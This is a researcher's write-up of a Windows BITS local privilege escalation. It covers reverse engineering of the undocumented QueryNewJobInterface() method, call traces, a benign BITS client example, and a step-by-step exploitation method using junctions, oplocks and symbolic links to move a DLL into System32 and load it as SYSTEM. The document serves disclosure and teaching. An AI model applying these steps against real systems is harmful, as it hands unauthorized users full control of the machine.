TL;DR

If you don’t know this Windows feature, here is a quote from Microsoft documentation (link).

Background Intelligent Transfer Service (BITS) is used by programmers and system administrators to download files from or upload files to HTTP web servers and SMB file shares. BITS will take the cost of the transfer into consideration, as well as the network usage so that the user’s foreground work has as little impact as possible. BITS also handles network interruptions, pausing and automatically resuming transfers, even after a reboot.

This service exposes several COM objects, which are different iterations of the “Control Class” and there is also a “Legacy Control Class”. The latter can be used to get a pointer to the legacy IBackgroundCopyGroup interface, which has two undocumented methods: QueryNewJobInterface() and SetNotificationPointer().

If a user invokes the CreateJob() method of the IBackgroundCopyGroup interface (i.e. the legacy one), he/she will get a pointer to the old IBackgroundCopyJob1 interface. On the other hand, if he/she invokes the QueryNewJobInterface() method of this same interface, he/she will get a pointer to the new IBackgroundCopyJob interface.

The issue is that this call was handled by the service without impersonation. It means that users get a pointer to an IBackgroundCopyJob interface in the context of NT AUTHORITY\SYSTEM. Impersonation is implemented in the other methods though so the impact is limited but there are still some side effects.

When a job is created and a file is added to the queue, a temporary file is created. Once the service has finished writing to the file, it is renamed with the filename specified by the user thanks to a call to MoveFileEx(). The problem is that, when using the interface pointer returned by QueryNewJobInterface(), this last operation is done without impersonation.

A normal user can therefore leverage this behavior to move an arbitrary file to a restricted location using mountpoints, oplocks and symbolic links.

How do the BITS COM Classes work?

The Background Intelligent Transfer Service exposes several COM objects, which can be easily listed using OleViewDotNet (a big thanks to James Forshaw once again).

Here, we will focus on the Background Intelligent Transfer (BIT) Control Class 1.0 and the Legacy BIT Control Class, and their main interfaces, which are respectively IBackgroundCopyManager and IBackgroundCopyQMgr.

The “new” BIT Control Class

The BIT Control Class 1.0 works as follows:

  1. You must create an instance of the BIT Control Class (CLSID: 4991D34B-80A1-4291-83B6-3328366B9097) and request a pointer to the IBackgroundCopyManager interface with CoCreateInstance().
  2. Then, you can create a “job” with a call to IBackgroundCopyManager::CreateJob() to get a pointer to the IBackgroundCopyJob interface.
  3. Then, you can add file(s) to the job with a call to IBackgroundCopyJob::AddFile(). This takes two parameters: a URL and a local file path. The URL can also be a UNC path.
  4. Finally, since the job is created in a SUSPENDED state, you have to call IBackgroundCopyJob::Resume() and IBackgroundCopyJob::Complete() when the state of the job is TRANSFERRED.
CoCreateInstance(CLSID_4991D34B-80A1-4291-83B6-3328366B9097)   -> IBackgroundCopyManager*
|__ IBackgroundCopyManager::CreateJob()                        -> IBackgroundCopyJob*
    |__ IBackgroundCopyJob::AddFile(URL, LOCAL_FILE) 
    |__ IBackgroundCopyJob::Resume() 
    |__ IBackgroundCopyJob::Complete()  

Although the BIT service runs as NT AUTHORITY\SYSTEM, all these operations are performed while impersonating the RPC client so no elevation of privilege is possible here.
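
As a side note, here is a minimal sketch of a client following these four steps; the GUID string is the CLSID of the BIT Control Class 1.0 mentioned above, error handling is reduced to a minimum, and a real client would poll IBackgroundCopyJob::GetState() until the job reaches the BG_JOB_STATE_TRANSFERRED state before calling Complete():

#include <windows.h>
#include <bits.h>
#include <stdio.h>

#pragma comment(lib, "ole32.lib")

int wmain()
{
    // CLSID of the "BIT Control Class 1.0" (see step 1 above).
    CLSID clsid;
    CLSIDFromString(L"{4991D34B-80A1-4291-83B6-3328366B9097}", &clsid);

    if (FAILED(CoInitializeEx(NULL, COINIT_MULTITHREADED)))
        return 1;

    IBackgroundCopyManager* pManager = NULL;
    if (SUCCEEDED(CoCreateInstance(clsid, NULL, CLSCTX_LOCAL_SERVER,
            __uuidof(IBackgroundCopyManager), (void**)&pManager)))
    {
        IBackgroundCopyJob* pJob = NULL;
        GUID jobId;

        // Step 2: create a download job. Step 3: add a file (UNC path as the "URL").
        if (SUCCEEDED(pManager->CreateJob(L"MyTestJob", BG_JOB_TYPE_DOWNLOAD, &jobId, &pJob)))
        {
            pJob->AddFile(L"\\\\127.0.0.1\\C$\\Windows\\System32\\drivers\\etc\\hosts",
                          L"C:\\Temp\\test.txt");

            // Step 4: resume the job and, once it is transferred, complete it.
            pJob->Resume();
            // ... poll GetState() until BG_JOB_STATE_TRANSFERRED ...
            pJob->Complete();
            pJob->Release();
        }
        pManager->Release();
    }

    CoUninitialize();
    return 0;
}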

The Legacy Control Class

The Legacy Control Class works a bit differently. An extra step is required at the beginning of the process.

  1. You must create an instance of the Legacy BIT Control Class (CLSID: 69AD4AEE-51BE-439B-A92C-86AE490E8B30) and request a pointer to the IBackgroundCopyQMgr interface with CoCreateInstance().
  2. Then, you can create a “group” with a call to IBackgroundCopyQMgr::CreateGroup() to get a pointer to the IBackgroundCopyGroup interface.
  3. Then, you can create a “job” with a call to IBackgroundCopyGroup::CreateJob() to get a pointer to the IBackgroundCopyJob1 interface.
  4. Then, you can add file(s) to the “job” with a call to IBackgroundCopyJob1::AddFiles(), which takes a FILESETINFO structure as a parameter.
  5. Finally, since the job is created in a SUSPENDED state, you have to call IBackgroundCopyJob1::Resume() and IBackgroundCopyJob1::Complete() when the state of the job is TRANSFERRED.
CoCreateInstance(CLSID_69AD4AEE-51BE-439B-A92C-86AE490E8B30)   -> IBackgroundCopyQMgr*
|__ IBackgroundCopyQMgr::CreateGroup()                         -> IBackgroundCopyGroup*
    |__ IBackgroundCopyGroup::CreateJob()                      -> IBackgroundCopyJob1*
        |__ IBackgroundCopyJob1::AddFiles(FILESETINFO)
        |__ IBackgroundCopyJob1::Resume()
        |__ IBackgroundCopyJob1::Complete()

Once again, although the BIT service runs as NT AUTHORITY\SYSTEM, all these operations are performed while impersonating the RPC client so no elevation of privilege is possible here either.

The use of these two COM classes and their interfaces is well documented on MSDN here and here. However, while trying to understand how the IBackgroundCopyGroup interface worked, I noticed some differences between the methods listed on MSDN and its actual Proxy definition.

The documentation of the IBackgroundCopyGroup interface is available here. According to this resource, it has 13 methods. Though, when viewing the proxy definition of this interface with OleViewDotNet, we can see that it actually has 15 methods.

Proc3 to Proc15 match the methods listed in the documentation but Proc16 and Proc17 are not there.

Thanks to the documentation, we know that the corresponding header file is Qmgr.h. If we open this file, we should get an accurate list of all the methods that are available on this interface.

Indeed, we can see the two undocumented methods: QueryNewJobInterface() and SetNotificationPointer().

An Undocumented Method: “QueryNewJobInterface()”

Thanks to OleViewDotNet, we know that the IBackgroundCopyQMgr interface is implemented in qmgr.dll so, we can open it in IDA and see if we can find more information about the IBackgroundCopyGroup interface and the two undocumented methods I mentioned.

The QueryNewJobInterface() method takes an interface identifier (REFIID iid) as input and returns an interface pointer through its second parameter (IUnknown **pUnk). The prototype of the function is as follows:

virtual HRESULT QueryNewJobInterface(REFIID iid, IUnknown **pUnk);

First, the input GUID (Interface ID) is compared against a hardcoded value (1): 37668d37-507e-4160-9316-26306d150b12. If it doesn’t match, then the function returns the error code 0x80004001 (2) – “Not implemented”. Otherwise, it calls the GetJobExternal() function from the CJob Class (3).

The hardcoded GUID value (37668d37-507e-4160-9316-26306d150b12) is interesting. It’s the value of IID_IBackgroundCopyJob. We can find it in the Bits.h header file.

The Arbitrary File Move Vulnerability

Before going any further into the reverse engineering process, we can make an educated guess based on the little information collected so far.

  • The name of the undocumented method is QueryNewJobInterface().
  • It’s exposed by the IBackgroundCopyGroup interface of the Legacy BIT Control Class.
  • The GUID of the “new” IBackgroundCopyJob interface is involved.

Therefore, we may assume that the purpose of this function is to get an interface pointer to the “new” IBackgroundCopyJob interface from the Legacy Control Class.

In order to verify this assumption, I created an application that does the following:

  1. It creates an instance of the Legacy Control Class and gets a pointer to the legacy IBackgroundCopyQMgr interface.
  2. It creates a new group with a call to IBackgroundCopyQMgr::CreateGroup() to get a pointer to the IBackgroundCopyGroup interface.
  3. It creates a new job with a call to IBackgroundCopyGroup::CreateJob() to get a pointer to the IBackgroundCopyJob1 interface.
  4. It adds a file to the job with a call to IBackgroundCopyJob1::AddFiles().
  5. And here is the crucial part, it calls the IBackgroundCopyGroup::QueryNewJobInterface() method and gets a pointer to an unknown interface but we will assume that it’s an IBackgroundCopyJob interface.
  6. It finally resumes and completes the job by calling Resume() and Complete() on the IBackgroundCopyJob interface instead of the IBackgroundCopyJob1 interface.

In this application, the target URL is \\127.0.0.1\C$\Windows\System32\drivers\etc\hosts (we don’t want to depend on a network access) and the local file is C:\Temp\test.txt.

Then, I analyzed the behavior of the BIT service with Procmon.

First, we can see that the service creates a TMP file in the target directory and tries to open the local file that was given as an argument, while impersonating the current user.

Then, once we call the Resume() function, the service starts reading the target file \\127.0.0.1\C$\Windows\System32\drivers\etc\hosts and writes its content to the TMP file C:\Temp\BITF046.tmp, still while impersonating the current user as expected.

Finally, the TMP file is renamed as test.txt with a call to MoveFileEx() and, here is the flaw! While doing so, the current user isn’t impersonated anymore, meaning that the file move operation is done in the context of NT AUTHORITY\SYSTEM.

The following screenshot confirms that the SetRenameInformationFile call originated from the Win32 MoveFileEx() function.

This arbitrary file move as SYSTEM results in a Local Privilege Escalation. By moving a specially crafted DLL to the System32 folder, a regular user may execute arbitrary code in the context of NT AUTHORITY\SYSTEM, as we will see in the final “Exploit” part.

Finding the Flaw

Before trying to find the flaw in the QueryNewJobInterface() function itself, I first tried to understand how the “standard” CreateJob() method worked.

The CreateJob() method of the IBackgroundCopyGroup interface is implemented in the COldGroupInterface class on server side.

It’s not obvious here because of CFG (Control Flow Guard) but this function calls the CreateJobInternal() method of the same class if I’m not mistaken.

This function starts by invoking the ValidateAccess() method of the CLockedJobWritePointer class, which calls the CheckClientAccess() method of the CJob class.

The CheckClientAccess() method is where the token of the user is checked and is applied to the current thread for impersonation.

Eventually, the execution flow goes back to the CreateJobInternal() method, which calls the GetOldJobExternal() method of the CJob class and returns a pointer to the IBackgroundCopyJob1 interface to the client.

The calls can be summarized as follows:

(CLIENT) IBackgroundCopyGroup::CreateJob()
   |
   V
(SERVER) COldGroupInterface::CreateJob()
         |__ COldGroupInterface::CreateJobInternal()
             |__ CLockedJobWritePointer::ValidateAccess()
             |   |__ CJob::CheckClientAccess() // Client impersonation
             |__ CJob::GetOldJobExternal() // IBackgroundCopyJob1* returned

Now that we know how the CreateJob() method works overall, we can go back to the reverse engineering of the QueryNewJobInterface() method.

We already saw that if the supplied GUID matches IID_IBackgroundCopyJob, the following piece of code is executed.

That’s where the new interface pointer is queried and returned to the client with an immediate call to CJob::GetJobExternal(). Therefore, it can simply be summarized as follows:

(CLIENT) IBackgroundCopyGroup::QueryNewJobInterface()
   |
   V
(SERVER) COldGroupInterface::QueryNewJobInterface()
         |__ CJob::GetJobExternal() // IBackgroundCopyJob* returned

We can see a part of the issue now. It seems that, when requesting a pointer to a new IBackgroundCopyJob interface from IBackgroundCopyGroup with a call to the QueryNewJobInterface() method, the client isn’t impersonated. This means that the client gets a pointer to an interface which exists within the context of NT AUTHORITY\SYSTEM (if that makes any sense).

The problem isn’t that simple though. Indeed, I noticed that the file move operation occurred after the call to IBackgroundCopyJob::Resume() and before the call to IBackgroundCopyJob::Complete().

Here is a very simplified call trace when invoking IBackgroundCopyJob::Resume():

(CLIENT) IBackgroundCopyJob::Resume()
   |
   V
(SERVER) CJobExternal::Resume()
         |__ CJobExternal::ResumeInternal()
             |__ ...
             |__ CJob::CheckClientAccess() // Client impersonation
             |__ CJob::Resume()
             |__ ...

Here is a very simplified call trace when invoking IBackgroundCopyJob::Complete():

(CLIENT) IBackgroundCopyJob::Complete()
   |
   V
(SERVER) CJobExternal::Complete()
         |__ CJobExternal::CompleteInternal()
             |__ ...
             |__ CJob::CheckClientAccess() // Client impersonation
             |__ CJob::Complete()
             |__ ...

In both cases, the client is impersonated. This means that the job wasn’t completed by the client. It was completed by the service itself, probably because there was no other file in the queue.

So, when an IBackgroundCopyJob interface pointer is obtained from a call to IBackgroundCopyGroup::QueryNewJobInterface() and the job is completed by the service rather than by the RPC client, the final CFile::MoveTempFile() call is done without impersonation. I was not able to spot the exact location of the logic flaw but I think that adding the CJob::CheckClientAccess() check in COldGroupInterface::QueryNewJobInterface() would probably solve the issue.

Here is a simplified graph showing the functions that lead to a MoveFileEx() call in the context of a CJob object.

How to Exploit this Vulnerability?

The exploit strategy is pretty straightforward. The idea is to give the service a path to a folder that will initially be used as a junction to another “physical” directory. We create a new job with a local file to “download” and set an Oplock on the TMP file. After resuming the job, the service will start writing to the TMP file while impersonating the RPC client and will hit the Oplock. All we need to do then is to switch the mountpoint to an Object Directory and create two symbolic links. The TMP file will point to any file we own and the “local” file will point to a new DLL file in the System32 folder. Finally, after releasing the Oplock, the service will continue writing to the original TMP file but it will perform the final move operation through our two symbolic links.

1) Prepare a workspace

The idea is to create a directory with the following structure:

<DIR> C:\workspace
|__ <DIR> bait
|__ <DIR> mountpoint
|__ FakeDll.dll

The purpose of the mountpoint directory is to switch from a junction to the bait directory to a junction to the RPC Control Object Directory. FakeDll.dll is the file we want to move to a restricted location such as C:\Windows\System32\.

2) Create a mountpoint

We want to create a mountpoint from C:\workspace\mountpoint to C:\workspace\bait.

3) Create a new job

We’ll use the interfaces provided by the Legacy Control Class to create a new job with the following parameters.

Target URL: \\127.0.0.1\C$\Windows\System32\drivers\etc\hosts
Local file: C:\workspace\mountpoint\test.txt

Because of the junction that was previously created, the real path of the local file will be C:\workspace\bait\test.txt.

4) Find the TMP file and set an Oplock

When adding a file to the job queue, the service immediately creates a TMP file. Since it has a “random” name, we have to list the content of the bait directory to find it. Here, we should find a name like BIT1337.tmp. Once we have the name, we can set an Oplock on the file.

5) Resume the job and wait for the Oplock

As mentioned earlier, as soon as the job is resumed, the service will open the TMP file for writing and will trigger the Oplock. This technique allows us to pause the operation and therefore easily win the race.  

6) Switch the mountpoint

Before this step:

TMP file   = C:\workspace\mountpoint\BIT1337.tmp -> C:\workspace\bait\BIT1337.tmp
Local file = C:\workspace\mountpoint\test.txt -> C:\workspace\bait\test.txt

We switch the mountpoint and create the symbolic links:

C:\workspace\mountpoint -> \RPC Control
Symlink #1: \RPC Control\BIT1337.tmp -> C:\workspace\FakeDll.dll
Symlink #2: \RPC Control\test.txt -> C:\Windows\System32\FakeDll.dll

After this step:

TMP file   = C:\workspace\mountpoint\BIT1337.tmp -> C:\workspace\FakeDll.dll
Local file = C:\workspace\mountpoint\test.txt -> C:\Windows\System32\FakeDll.dll

7) Release the Oplock and complete the job

After releasing the Oplock, the CreateFile operation on the original TMP file will return and the service will start writing to C:\workspace\bait\BIT1337.tmp. After that, the final MoveFileEx() call will be redirected because of the symbolic links. Therefore, our DLL will be moved to the System32 folder.

Because it’s a move operation, the properties of the file are preserved. This means that the file is still owned by the current user so it can be modified afterwards even if it’s in a restricted location.

8) (Exploit) Code execution as System

To get code execution as System, I used the arbitrary file move vulnerability to create the WindowsCoreDeviceInfo.dll file in the System32 folder. Then, I leveraged the Update Session Orchestrator service to load the DLL as System.

Demo

Links & Resources
